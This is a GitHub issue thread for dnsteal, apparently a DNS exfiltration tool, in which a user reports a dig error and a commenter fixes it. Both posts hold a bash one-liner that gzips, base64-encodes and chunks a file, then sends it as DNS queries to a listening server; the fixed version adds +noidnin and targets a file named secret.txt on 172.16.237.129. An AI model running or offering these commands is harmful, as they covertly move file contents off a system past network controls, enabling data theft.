### ISSUE TITLE
Issue when trying to send an indv file

### ISSUE THREAD

**Issue by TH3xACE** [m57/dnsteal#12]
f=test.txt; s=4;b=57;c=0; for r in $(for i in $(gzip -c $f| base64 -w0 | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s"  ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @127.0.0.1 `echo -ne $r$f|tr "+" "*"` +short; done
dig: 'H4sICECX7lsAA3RvdG8udHh0AAvJyCxWAKJEhbTS5OzMvHSFktTiEoW0o-.vxchRD/EP*sIi4AxvE2RiMAAAA=-.test.txt' is not a legal IDN name (string start/ends with forbidden hyphen), use +noidnin

**Comment by technoherder** [comment]
This is a late respone, but in case anyone else runs into this:

The error is saying it needs to add the +noidnin switch to the dig command.

````f=secret.txt; s=4;b=57;c=0; for r in $(for i in $(gzip -c $f| base64 -w0 | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s"  ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @172.16.237.129 `echo -ne $r$f|tr "+" "*"` +short +noidnin; done````
